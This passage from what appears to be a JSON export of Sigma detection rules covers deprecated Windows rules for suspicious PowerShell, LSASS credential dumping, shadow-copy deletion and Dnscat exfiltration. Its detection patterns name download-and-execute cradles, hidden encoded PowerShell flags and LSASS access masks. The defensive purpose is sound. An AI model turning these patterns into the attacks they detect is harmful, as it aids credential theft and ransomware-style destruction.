    "content": "title: Execution via CL_Mutexverifiers.ps1\nid: 39776c99-1c7b-4ba0-b5aa-641525eee1a4\nstatus: deprecated\ndescription: Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module\nreferences:\n    - https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/\n    - https://twitter.com/pabraeken/status/995111125447577600\nauthor: oscd.community, Natalia Shornikova\ndate: 2020/10/14\nmodified: 2023/08/17\ntags:\n    - attack.defense_evasion\n    - attack.t1216\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'CL_Mutexverifiers.ps1'\n            - 'runAfterCancelProcess'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/posh_ps_dnscat_execution.yml",
    "content": "title: Dnscat Execution\nid: a6d67db4-6220-436d-8afc-f3842fe05d43\nstatus: deprecated # In favour of the more generic Susp and Malicious Cmdlet rules\ndescription: Dnscat exfiltration tool execution\nauthor: Daniil Yugoslavskiy, oscd.community\ndate: 2019/10/24\nmodified: 2024/01/25\ntags:\n    - attack.exfiltration\n    - attack.t1048\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains: 'Start-Dnscat2'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely)\nlevel: critical\n"
  },
  {
    "path": "deprecated/windows/posh_ps_exchange_mailbox_smpt_forwarding_rule.yml",
    "content": "title: Suspicious PowerShell Mailbox SMTP Forward Rule\nid: 15b7abbb-8b40-4d01-9ee2-b51994b1d474\nstatus: deprecated\ndescription: Detects usage of the powerShell Set-Mailbox Cmdlet to set-up an SMTP forwarding rule.\nreferences:\n    - https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-26\nmodified: 2026-03-01\ntags:\n    - attack.exfiltration\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'Set-Mailbox '\n            - ' -DeliverToMailboxAndForward '\n            - ' -ForwardingSmtpAddress '\n    condition: selection\nfalsepositives:\n    - Legitimate usage of the cmdlet to forward emails\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/posh_ps_file_and_directory_discovery.yml",
    "content": "title: Powershell File and Directory Discovery\nid: d23f2ba5-9da0-4463-8908-8ee47f614bb9\nstatus: deprecated\ndescription: |\n    Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.\n    Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors,\n    including whether or not the adversary fully infects the target and/or attempts specific actions.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md\nauthor: frack113\ndate: 2021/12/15\nmodified: 2023/12/11\ntags:\n    - attack.discovery\n    - attack.t1083\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - ls\n            - get-childitem\n            - gci\n    recurse:\n        ScriptBlockText|contains: '-recurse'\n    condition: selection and recurse\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "deprecated/windows/posh_ps_invoke_nightmare.yml",
    "content": "title: PrintNightmare Powershell Exploitation\nid: 6d3f1399-a81c-4409-aff3-1ecfe9330baf\nstatus: deprecated\ndescription: Detects Commandlet name for PrintNightmare exploitation.\nreferences:\n    - https://github.com/calebstewart/CVE-2021-1675\nauthor: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)\ndate: 2021/08/09\nmodified: 2023/01/02\ntags:\n    - attack.privilege_escalation\n    - attack.t1548\nlogsource:\n    product: windows\n    category: ps_script\n    definition: Script Block Logging must be enabled\ndetection:\n    selection:\n        ScriptBlockText|contains: 'Invoke-Nightmare'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/posh_ps_susp_gwmi.yml",
    "content": "title: Suspicious Get-WmiObject\nid: 0332a266-b584-47b4-933d-a00b103e1b37\nstatus: deprecated\ndescription: The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers\nreferences:\n    - https://attack.mitre.org/datasources/DS0005/\n    - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7\nauthor: frack113\ndate: 2022/01/12\nmodified: 2023/12/11\ntags:\n    - attack.persistence\n    - attack.t1546\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'Get-WmiObject'\n            - 'gwmi'\n    filter_cl_utility:\n        Path|endswith: '\\CL_Utility.ps1'\n        ScriptBlockText|contains|all:\n            - 'function Get-FreeSpace'\n            - 'SELECT * FROM Win32_LogicalDisk WHERE MediaType=12'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Legitimate PowerShell scripts\nlevel: low\n"
  },
  {
    "path": "deprecated/windows/powershell_ps_susp_win32_shadowcopy.yml",
    "content": "title: Delete Volume Shadow Copies via WMI with PowerShell - PS Script\nid: e17121b4-ef2a-4418-8a59-12fb1631fa9e\nrelated:\n    - id: 21ff4ca9-f13a-41ad-b828-0077b2af2e40\n      type: similar\n    - id: c1337eb8-921a-4b59-855b-4ba188ddcc42\n      type: similar\nstatus: deprecated\ndescription: Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell\nauthor: frack113\ndate: 2021-12-26\nmodified: 2025-05-20\ntags:\n    - attack.impact\n    - attack.t1490\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'Get-WmiObject'\n            - 'Win32_ShadowCopy'\n            - '.Delete()'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/powershell_suspicious_download.yml",
    "content": "title: Suspicious PowerShell Download\nid: 65531a81-a694-4e31-ae04-f8ba5bc33759\nstatus: deprecated\ndescription: Detects suspicious PowerShell download command\ntags:\n    - attack.execution\n    - attack.t1059.001\nauthor: Florian Roth (Nextron Systems)\ndate: 2017/03/05\nmodified: 2022/04/11\nlogsource:\n    product: windows\n    service: powershell\ndetection:\n    webclient:\n        - 'System.Net.WebClient'\n    download:\n        - '.DownloadFile('\n        - '.DownloadString('\n    condition: webclient and download\nfalsepositives:\n    - PowerShell scripts that download content from the Internet\nlevel: medium"
  },
  {
    "path": "deprecated/windows/powershell_suspicious_invocation_generic.yml",
    "content": "title: Suspicious PowerShell Invocations - Generic\nid: 3d304fda-78aa-43ed-975c-d740798a49c1\nstatus: deprecated\ndescription: Detects suspicious PowerShell invocation command parameters\ntags:\n    - attack.execution\n    - attack.t1059.001\nauthor: Florian Roth (Nextron Systems)\ndate: 2017/03/12\nmodified: 2022/04/11\nlogsource:\n    product: windows\n    service: powershell\ndetection:\n    selection_encoded:\n        - ' -enc '\n        - ' -EncodedCommand '\n    selection_hidden:\n        - ' -w hidden '\n        - ' -window hidden '\n        - ' -windowstyle hidden '\n    selection_noninteractive:\n        - ' -noni '\n        - ' -noninteractive '\n    condition: all of selection*\nfalsepositives:\n    - Very special / sneaky PowerShell scripts\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/powershell_suspicious_invocation_specific.yml",
    "content": "title: Suspicious PowerShell Invocations - Specific\nid: fce5f582-cc00-41e1-941a-c6fabf0fdb8c\nstatus: deprecated\ndescription: Detects suspicious PowerShell invocation command parameters\ntags:\n    - attack.execution\n    - attack.t1059.001\nauthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro\ndate: 2017/03/05\nmodified: 2023/05/04\nlogsource:\n    product: windows\n    service: powershell\n    definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103\ndetection:\n    selection_convert_b64:\n        '|all':\n            - '-nop'\n            - ' -w '\n            - 'hidden'\n            - ' -c '\n            - '[Convert]::FromBase64String'\n    selection_iex:\n        '|all':\n            - ' -w '\n            - 'hidden'\n            - '-noni'\n            - '-nop'\n            - ' -c '\n            - 'iex'\n            - 'New-Object'\n    selection_enc:\n        '|all':\n            - ' -w '\n            - 'hidden'\n            - '-ep'\n            - 'bypass'\n            - '-Enc'\n    selection_reg:\n        '|all':\n            - 'powershell'\n            - 'reg'\n            - 'add'\n            - 'HKCU\\software\\microsoft\\windows\\currentversion\\run'\n    selection_webclient:\n         '|all':\n            - 'bypass'\n            - '-noprofile'\n            - '-windowstyle'\n            - 'hidden'\n            - 'new-object'\n            - 'system.net.webclient'\n            - '.download'\n    selection_iex_webclient:\n        '|all':\n            - 'iex'\n            - 'New-Object'\n            - 'Net.WebClient'\n            - '.Download'\n    filter_chocolatey:\n        - \"(New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1\"\n        - \"(New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1')\"\n        - 'Write-ChocolateyWarning'\n    condition: 1 of selection_* and not 1 of filter_*\nfalsepositives:\n    - 
Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/powershell_syncappvpublishingserver_exe.yml",
    "content": "title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction\nid: 9f7aa113-9da6-4a8d-907c-5f1a4b908299\nrelated:\n    - id: fde7929d-8beb-4a4c-b922-be9974671667\n      type: derived\ndescription: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/\nauthor: 'Ensar Şamil, @sblmsrsn, OSCD Community'\ndate: 2020/10/05\nmodified: 2022/04/11\ntags:\n    - attack.defense_evasion\n    - attack.t1218\nlogsource:\n    product: windows\n    service: powershell\ndetection:\n    selection:\n        - 'SyncAppvPublishingServer.exe'\n    condition: selection\nfalsepositives:\n    - App-V clients\nlevel: medium\nstatus: deprecated"
  },
  {
    "path": "deprecated/windows/proc_access_win_in_memory_assembly_execution.yml",
    "content": "title: Suspicious In-Memory Module Execution\nid: 5f113a8f-8b61-41ca-b90f-d374fa7e4a39\nstatus: deprecated\ndescription: |\n    Detects the access to processes by other suspicious processes which have reflectively loaded libraries in their memory space.\n    An example is SilentTrinity C2 behaviour. Generally speaking, when Sysmon EventID 10 cannot reference a stack call to a dll loaded from disk (the standard way),\n    it will display \"UNKNOWN\" as the module name. Usually this means the stack call points to a module that was reflectively loaded in memory.\n    Adding to this, it is not common to see such few calls in the stack (ntdll.dll --> kernelbase.dll --> unknown) which essentially means that\n    most of the functions required by the process to execute certain routines are already present in memory, not requiring any calls to external libraries.\n    The latter should also be considered suspicious.\nreferences:\n    - https://azure.microsoft.com/en-ca/blog/detecting-in-memory-attacks-with-sysmon-and-azure-security-center/\nauthor: Perez Diego (@darkquassar), oscd.community, Jonhnathan Ribeiro\ndate: 2019/10/27\nmodified: 2022/11/17\ntags:\n    - attack.privilege_escalation\n    - attack.defense_evasion\n    - attack.t1055.001\n    - attack.t1055.002\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection1:\n        CallTrace|contains|all:\n            - 'C:\\WINDOWS\\SYSTEM32\\ntdll.dll+'\n            - '|C:\\WINDOWS\\System32\\KERNELBASE.dll+'\n            - '|UNKNOWN('\n            - ')'\n    selection2:\n        CallTrace|contains|all:\n            - 'UNKNOWN('\n            - ')|UNKNOWN('\n        CallTrace|endswith: ')'\n    selection3:\n        CallTrace|contains: 'UNKNOWN'\n        GrantedAccess:\n            - '0x1F0FFF'\n            - '0x1F1FFF'\n            - '0x143A'\n            - '0x1410'\n            - '0x1010'\n            - '0x1F2FFF'\n            - '0x1F3FFF'\n            - '0x1FFFFF'\n    
filter:\n        - SourceImage|endswith:\n            - '\\Windows\\System32\\sdiagnhost.exe'\n            - '\\procexp64.exe'\n            - '\\procexp.exe'\n            - '\\Microsoft VS Code\\Code.exe'\n            - '\\aurora-agent-64.exe'\n            - '\\aurora-agent.exe'\n            - '\\git\\usr\\bin\\sh.exe'\n            - '\\IDE\\devenv.exe'\n            - '\\GitHubDesktop\\Update.exe'\n            - '\\RuntimeBroker.exe'\n            - '\\backgroundTaskHost.exe'\n            - '\\GitHubDesktop.exe'\n        - SourceImage|startswith:\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n            - 'C:\\Windows\\Microsoft.NET\\Framework\\\\*\\NGenTask.exe'\n            - 'C:\\Program Files (x86)\\Microsoft Visual Studio\\'\n            - 'C:\\Program Files\\Microsoft Visual Studio\\'\n            - 'C:\\Windows\\Microsoft.NET\\Framework'\n            - 'C:\\WINDOWS\\System32\\DriverStore\\'\n            - 'C:\\Windows\\System32\\WindowsPowerShell\\'\n        - SourceImage:\n            - 'C:\\WINDOWS\\system32\\taskhostw.exe'\n            - 'C:\\WINDOWS\\system32\\ctfmon.exe'\n            - 'C:\\WINDOWS\\system32\\NhNotifSys.exe'\n            - 'C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe'\n            - 'C:\\Windows\\explorer.exe'\n        - TargetImage: 'C:\\Windows\\System32\\RuntimeBroker.exe'\n        - TargetImage|endswith: '\\Microsoft VS Code\\Code.exe'\n        - CallTrace|contains: '|C:\\WINDOWS\\System32\\RPCRT4.dll+'  # attempt to save the rule with a broader filter\n    filter_set_1:\n        SourceImage: 'C:\\WINDOWS\\Explorer.EXE'\n        TargetImage:\n            - 'C:\\WINDOWS\\system32\\backgroundTaskHost.exe'\n            - 'C:\\WINDOWS\\explorer.exe'\n    filter_msmpeng:\n        SourceImage|startswith: 'C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n        SourceImage|endswith: '\\MsMpEng.exe'\n    filter_eclipse:\n        SourceImage|endswith: '\\eclipse.exe'\n        
CallTrace|contains:\n            - '\\jre\\bin\\java.dll'\n            - '|C:\\Windows\\SYSTEM32\\windows.storage.dll+'\n            - '\\configuration\\org.eclipse.osgi\\'\n    filter_openwith:\n        SourceImage: 'C:\\Windows\\system32\\OpenWith.exe'\n        TargetImage: 'C:\\Windows\\Explorer.EXE'\n    filter_teams:\n        SourceImage|startswith: 'C:\\Users\\'\n        SourceImage|endswith: '\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe'\n        TargetImage|endswith:\n            - ':\\Windows\\Explorer.EXE'\n            - '\\AppData\\Local\\Microsoft\\Teams\\Update.exe'\n            - '\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe'\n            - '\\MsMpEng.exe'\n    filter_wwahost:\n        SourceImage: 'C:\\Windows\\System32\\WWAHost.exe'\n        TargetImage: 'C:\\Windows\\System32\\svchost.exe'\n    filter_sppsvc:\n        SourceImage: C:\\WINDOWS\\system32\\sppsvc.exe\n        TargetImage: C:\\WINDOWS\\system32\\SppExtComObj.exe\n    condition: 1 of selection* and not 1 of filter*\nfields:\n    - ComputerName\n    - User\n    - SourceImage\n    - TargetImage\n    - CallTrace\nfalsepositives:\n    - SysInternals Process Explorer\nlevel: low\n"
  },
  {
    "path": "deprecated/windows/proc_access_win_lazagne_cred_dump_lsass_access.yml",
    "content": "title: Credential Dumping by LaZagne\nid: 4b9a8556-99c4-470b-a40c-9c8d02c77ed0\nstatus: stable\ndescription: Detects LSASS process access by LaZagne for credential dumping.\nreferences:\n    - https://twitter.com/bh4b3sh/status/1303674603819081728\nauthor: Bhabesh Raj, Jonhnathan Ribeiro\ndate: 2020/09/09\nmodified: 2022/08/13\ntags:\n    - attack.credential_access\n    - attack.t1003.001\n    - attack.s0349\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        TargetImage|endswith: '\\lsass.exe'\n        CallTrace|contains|all:\n            - 'C:\\Windows\\SYSTEM32\\ntdll.dll+'\n            - '|C:\\Windows\\System32\\KERNELBASE.dll+'\n            - '_ctypes.pyd+'\n            - 'python27.dll+'\n        GrantedAccess: '0x1FFFFF'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "deprecated/windows/proc_access_win_lsass_susp_access.yml",
    "content": "title: Credential Dumping Tools Accessing LSASS Memory\nid: 32d0d3e2-e58d-4d41-926b-18b520b2b32d\nstatus: deprecated\ndescription: Detects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools\nreferences:\n    - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow\n    - https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\n    - https://web.archive.org/web/20230420013146/http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf\nauthor: Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community\ndate: 2017/02/16\nmodified: 2023/11/30\ntags:\n    - attack.credential_access\n    - attack.t1003.001\n    - attack.s0002\n    - car.2019-04-004\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        TargetImage|endswith: '\\lsass.exe'\n        GrantedAccess|startswith:\n            - '0x40'\n            # - '0x1000'  # minimum access requirements to query basic info from service\n            # - '0x1400'\n            - '0x100000'\n            - '0x1410'    # car.2019-04-004\n            # - '0x1010'    # car.2019-04-004\n            - '0x1438'    # car.2019-04-004\n            - '0x143a'    # car.2019-04-004\n            - '0x1418'    # car.2019-04-004\n            - '0x1f0fff'\n            - '0x1f1fff'\n            - '0x1f2fff'\n            - '0x1f3fff'\n    filter_exact:\n        SourceImage:\n            - 'C:\\WINDOWS\\system32\\taskmgr.exe'\n            - 'C:\\Windows\\System32\\perfmon.exe'\n    filter_generic:\n        
SourceImage|startswith:\n            - 'C:\\Program Files\\'\n            - 'C:\\Program Files (x86)\\'\n        GrantedAccess:\n            - '0x1410'\n            - '0x410'\n    filter_defender:\n        SourceImage|startswith:\n            - 'C:\\ProgramData\\Microsoft\\Windows Defender\\'\n            - 'C:\\Program Files\\Windows Defender\\'\n            - 'C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe' # Windows7\n        SourceImage|endswith: '\\MsMpEng.exe'\n    filter_defender_updates:\n        SourceImage: 'C:\\Windows\\System32\\svchost.exe'\n        CallTrace|contains|all:\n            - '|C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{'\n            - '}\\mpengine.dll+'\n        GrantedAccess: '0x1418'\n    filter_defender_calltrace:\n        CallTrace|contains:\n            - '|c:\\program files\\windows defender\\mprtp.dll'\n            - '|c:\\program files\\windows defender\\MpClient.dll'\n    filter_gaming_services:\n        SourceImage|startswith: 'C:\\Program Files\\WindowsApps\\'\n        SourceImage|endswith: '\\GamingServices.exe'\n        GrantedAccess:\n            - '0x1410'\n            - '0x410'\n    filter_specific_granted_access_1:\n        SourceImage|endswith:\n            - '\\PROCEXP64.EXE'\n            - '\\PROCEXP.EXE'\n            - 'C:\\WINDOWS\\system32\\taskhostw.exe'\n            - '\\MBAMInstallerService.exe'\n        GrantedAccess:\n            - '0x1410'\n            - '0x410'\n            - '0x40'\n    filter_specific_granted_access_2:\n        SourceImage:\n            - 'C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe'\n            - 'C:\\Windows\\syswow64\\MsiExec.exe'\n            - 'C:\\Windows\\System32\\msiexec.exe'\n        GrantedAccess:\n            - '0x1410'\n            - '0x410'\n            - '0x1f1fff'\n            - '0x1f3fff'\n    filter_specific_granted_access_3:\n        SourceImage:\n            - 'C:\\Windows\\system32\\wininit.exe'\n            - 
'C:\\Windows\\System32\\lsass.exe'\n        GrantedAccess: '0x1000000'\n    filter_vmwaretools:\n        SourceImage|startswith: 'C:\\ProgramData\\VMware\\VMware Tools\\'\n        SourceImage|endswith: '\\vmtoolsd.exe'\n    filter_svchost:\n        SourceImage: 'C:\\WINDOWS\\system32\\svchost.exe'\n        GrantedAccess:\n            - '0x100000'\n            - '0x1410'\n    filter_nextron:\n        SourceImage|endswith:\n            - '\\thor.exe'\n            - '\\thor64.exe'\n            - '\\aurora-agent.exe'\n            - '\\aurora-agent-64.exe'\n        GrantedAccess:\n            - '0x40'\n            - '0x1010'\n    filter_explorer:\n        SourceImage|endswith: '\\explorer.exe'\n        GrantedAccess: '0x401'\n    filter_mrt:\n        SourceImage: 'C:\\Windows\\system32\\MRT.exe' # Windows Malicious Software Removal Tool\n        GrantedAccess:\n            - '0x1410'\n            - '0x1418'\n    filter_handle:\n        GrantedAccess: '0x40'\n        SourceImage|endswith:\n            - '\\handle.exe'\n            - '\\handle64.exe'\n    filter_edge: # version in path 96.0.1054.43\n        SourceImage|startswith: 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n        SourceImage|endswith: '\\Installer\\setup.exe'\n    filter_webex:\n        SourceImage|endswith: '\\AppData\\Local\\WebEx\\WebexHost.exe'\n        GrantedAccess: '0x401'\n    filter_malwarebytes:\n        SourceImage: 'C:\\PROGRAMDATA\\MALWAREBYTES\\MBAMSERVICE\\ctlrupdate\\mbupdatr.exe'\n        GrantedAccess: '0x1410'\n    filter_dropbox:\n        SourceImage|contains:\n            - ':\\Windows\\Temp\\'\n            - '\\AppData\\Local\\Temp\\'\n        SourceImage|endswith: '.tmp\\DropboxUpdate.exe'\n        GrantedAccess:\n            - '0x410'\n            - '0x1410'\n    filter_msbuild:\n        # This FP was generated while building CPython from source and could be related to other similar examples.\n        # But if you don't do that kind of stuff consider removing it 
from the rule ;)\n        SourceImage|startswith: 'C:\\Program Files\\Microsoft Visual Studio\\'\n        SourceImage|endswith: '\\MSBuild\\Current\\Bin\\MSBuild.exe'\n        GrantedAccess: '0x1F3FFF'\n    # Old - too broad filter\n        # SourceImage|endswith: # easy to bypass. need to implement supportive rule to detect bypass attempts\n        #     - '\\wmiprvse.exe'\n        #     - '\\taskmgr.exe'\n        #     - '\\procexp64.exe'\n        #     - '\\procexp.exe'\n        #     - '\\lsm.exe'\n        #     - '\\MsMpEng.exe'\n        #     - '\\csrss.exe'\n        #     - '\\wininit.exe'\n        #     - '\\vmtoolsd.exe'\n    filter_games:\n        SourceImage|contains: '\\SteamLibrary\\steamapps\\'\n    condition: selection and not 1 of filter_*\nfields:\n    - ComputerName\n    - User\n    - SourceImage\nfalsepositives:\n    - Likely\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_access_win_pypykatz_cred_dump_lsass_access.yml",
    "content": "title: Credential Dumping by Pypykatz\nid: 7186e989-4ed7-4f4e-a656-4674b9e3e48b\nstatus: test\ndescription: Detects LSASS process access by pypykatz for credential dumping.\nreferences:\n    - https://github.com/skelsec/pypykatz\nauthor: Bhabesh Raj\ndate: 2021/08/03\nmodified: 2022/10/09\ntags:\n    - attack.credential_access\n    - attack.t1003.001\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        TargetImage|endswith: '\\lsass.exe'\n        CallTrace|contains|all:\n            - 'C:\\Windows\\SYSTEM32\\ntdll.dll+'\n            - 'C:\\Windows\\System32\\KERNELBASE.dll+'\n            - 'libffi-7.dll'\n            - '_ctypes.pyd+'\n            - 'python3*.dll+'   # Pypy requires python>=3.6\n        GrantedAccess: '0x1FFFFF'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "deprecated/windows/proc_access_win_susp_invoke_patchingapi.yml",
    "content": "title: Potential NT API Stub Patching\nid: b916cba1-b38a-42da-9223-17114d846fd6\nstatus: deprecated\ndescription: Detects potential NT API stub patching as seen used by the project PatchingAPI\nreferences:\n    - https://web.archive.org/web/20230106211702/https://github.com/D1rkMtr/UnhookingPatch\n    - https://twitter.com/D1rkMtr/status/1611471891193298944?s=20\nauthor: frack113\ndate: 2023/01/07\nmodified: 2024/05/27\ntags:\n    - attack.defense_evasion\n    - attack.t1562.002\nlogsource:\n    category: process_access\n    product: windows\ndetection:\n    selection:\n        GrantedAccess: '0x1FFFFF'\n        CallTrace|startswith: 'C:\\Windows\\SYSTEM32\\ntdll.dll+'\n        CallTrace|contains: '|UNKNOWN('\n        CallTrace|endswith: ')'\n    filter_main_generic:\n        # To avoid FP with installed applications. This filter assumes that if an application is located here. The attacker has already achieved admin rights\n        - SourceImage|contains:\n              - ':\\Program Files\\'\n              - ':\\Program Files (x86)\\'\n              - ':\\Windows\\System32\\'\n              - ':\\Windows\\SysWOW64\\'\n        - TargetImage|contains:\n              - ':\\Program Files\\'\n              - ':\\Program Files (x86)\\'\n              - ':\\Windows\\System32\\'\n              - ':\\Windows\\SysWOW64\\'\n    filter_optional_thor:\n        SourceImage|endswith:\n            - '\\thor.exe'\n            - '\\thor64.exe'\n    filter_optional_githubdesktop:\n        SourceImage|contains|all:\n            - ':\\Users\\'\n            - '\\AppData\\Local\\GitHubDesktop\\app-'\n        SourceImage|endswith:\n            - '\\GitHubDesktop.exe'\n            - '\\resources\\app\\git\\usr\\bin\\sh.exe'\n        TargetImage|contains|all:\n            - ':\\Users\\'\n            - '\\AppData\\Local\\GitHubDesktop\\app-'\n    filter_main_dotnet:\n        SourceImage|contains: ':\\Windows\\Microsoft.NET\\'\n        TargetImage|contains: 
':\\Windows\\Microsoft.NET\\'\n    filter_main_taskhost:\n        SourceImage|contains:\n            - ':\\Windows\\system32\\taskhostw.exe'\n            - ':\\Windows\\system32\\taskhost.exe'\n        TargetImage|contains:\n            - ':\\Windows\\Microsoft.NET\\Framework\\v'\n            - ':\\Windows\\Microsoft.NET\\Framework64\\v'\n        TargetImage|endswith: '\\NGenTask.exe'\n    filter_optional_teams_to_update:\n        SourceImage|endswith: '\\AppData\\Local\\Microsoft\\Teams\\stage\\Teams.exe'\n        TargetImage|endswith: '\\AppData\\Local\\Microsoft\\Teams\\Update.exe'\n    filter_optional_teams_update_regsvr32:\n        SourceImage|endswith: '\\AppData\\Local\\Microsoft\\Teams\\Update.exe'\n        TargetImage|endswith: ':\\WINDOWS\\SysWOW64\\regsvr32.exe'\n    filter_optional_teams_update_to_teams:\n        SourceImage|endswith: '\\AppData\\Local\\Microsoft\\Teams\\Update.exe'\n        TargetImage|endswith: '\\AppData\\Local\\Microsoft\\Teams\\stage\\Teams.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_apt_apt29_thinktanks.yml",
    "content": "title: APT29\nid: 033fe7d6-66d1-4240-ac6b-28908009c71f\nstatus: deprecated\ndescription: This method detects a suspicious PowerShell command line combination as used by APT29 in a campaign against U.S. think tanks.\nreferences:\n    - https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/\n    - https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2018/12/04\nmodified: 2023/03/08\ntags:\n    - attack.execution\n    - attack.g0016\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '-noni'\n            - '-ep'\n            - 'bypass'\n            - '$'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_apt_dragonfly.yml",
    "content": "title: CrackMapExecWin\nid: 04d9079e-3905-4b70-ad37-6bdf11304965\nstatus: deprecated\ndescription: Detects CrackMapExecWin Activity as Described by NCSC\nreferences:\n    - https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control\n    - https://attack.mitre.org/software/S0488/\nauthor: Markus Neis\ndate: 2018/04/08\nmodified: 2023/03/08\ntags:\n    - attack.g0035\n    - attack.credential_access\n    - attack.discovery\n    - attack.t1110\n    - attack.t1087\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\crackmapexec.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_apt_gallium.yml",
